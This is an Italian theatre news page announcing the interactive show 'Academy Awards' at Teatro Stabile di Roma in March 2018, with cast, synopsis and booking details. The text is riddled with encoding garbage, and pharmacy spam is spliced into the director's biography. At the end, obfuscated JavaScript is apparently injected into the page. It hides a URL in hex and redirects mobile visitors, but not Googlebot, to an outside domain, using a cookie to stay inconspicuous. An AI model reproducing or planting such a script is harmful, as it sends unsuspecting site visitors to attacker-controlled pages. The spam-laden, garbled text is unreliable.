News

Academy Awards, dal 9 all’11 marzo, in prima nazionale al Teatro Stabile di Roma

SarA� in scena inA� Prima Nazionale al Teatro Stabile di Roma dal 9 all’11 marzo 2018 a�?ACADEMY AWARDSa�?, con Maria Beatrice Alonzi, Francesco Guglielmi, Davide Guzzardi, Clarissa Ciaccio, Paola Campagna, Francesca Di Vetta, Simona Faustino Ventapane, Andrea Frattali, Lorenzo Giovannetti, Francesca Mareggiato, Pamela Placitelli, Stefania Nocca, Maria Teresa Robusto, Elena Rossetto, Laura Rotalinti, Giovanni Salvatori, Michaela Torricella e Marco Valeri –A� Luci di Andrea VanniniRegia di Giorgia Mazzucato.

Introduzione
a�?ACADEMY AWARDSa�? A? una delle nuove produzioni della stagione 2017/18 del Teatro Stabile di RomaA�, che, per questa��anno, ha scelto di affrontare grandi progetti nazionali ed internazionali.

Lo spettacolo A? una rocambolesca corsa alla��Oscar, incredibilmente divertente, coinvolgente, interattivo per il pubblico e tutto da ridere.

Sinossi dello spettacolo
Immaginate di poter partecipare alla notte degli Oscar. Quella che vedete in televisione e che vi incolla allo schermo.

Immaginate di poter decidere voi i titoli delle pellicole vincitrici, di deciderne il genere e di dirigerne anche degli estratti: sarete voi i registi!

Immaginate di potervi sedere in platea e di assistere, davanti a voi, alla premiazione piA? importante del mondo dello spettacolo.

Immaginate di veder sul palco interpretati dal vivo, uno dopo la��altro, spezzoni dei film premiati per Miglior film, Miglior Sceneggiatura, Migliori effetti speciali, Miglior attore protagonista, e tanti altri..

Immaginate di poter inventare il vostro regista perfetto e poterlo intervistare.

Hollywood non A? mai stata cosA� vicino.

Questo A? Academy Awards, la vostra notte degli Oscar.

In scena anche Francesco Guglielmi, finalista Premio Hystrio alla Vocazione 2017; Maria Beatrice Alonzi, definita dalla AFP, la��agenzia di stampa internazionale a�?La digital Artist Italianaa�?, attrice e regista riconosciuta per il suo impegno nel sociale, marketing strategist da 4 milioni di click, famosa per le sue interpretazioni diventate virali da milioni di views sul web.

Lo spettacolo A? ideato e diretto da Giorgia Mazzucato, attrice autrice e regista allieva, tra gli altri, di celebrex without prescription, purchase clomid. Dario Fo e Franca Rame, vincitrice con i suoi spettacoli originali di moltissimi premi nazionali e internazionali, tra i quali ricordiamo, lo scorso luglio, la��ambito Best & Outstanding International Artist al San Diego Fringe Festival 2017, San Diego, California.

a�?Academy Awardsa�? A? una produzione del Teatro Stabile di RomaA�

INFO:
TEATRO STABILE DI ROMA, via Assisi 3
VenerdA� 9 – Sabato 10 marzo: ore 21:00
Domenica 11 marzo: ore 18:00
prenotando via mail a biglietti@lasiti.it il ridotto a 12 a��

La SITIA�
Durante il 2018, gli attori e allievi de La SITIA� (la scuola e casa di produzione del Teatro Stabile di RomaA�) saranno in scena in California a Luglio per il San Diego Fringe Festival e a New York, alla��interno del prestigioso contesto della Casa Italiana Zerilli MarimA? nella rinomata UniversitA� dello stato New York: la NYU. Contestualmente, anche il metodo di insegnamento de La SITIA�, il Metodo MITA� (primo metodo al mondo codificato nello studio della��improvvisazione teatrale), con il quale vengono preparati gli attori alla messa in scena di format come Godot, verrA� portato come materia di insegnamento al dipartimento di Linguistica Italiana della��NYU proprio dalle sue founder: Giorgia Mazzucato (Direttore Artistico del Teatro Stabile di RomaA� e Direttore Didattico de La SITIA�) e Maria Beatrice Alonzi (Direttore Esecutivo del Teatro Stabile di RomaA� e de La SITIA�)

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}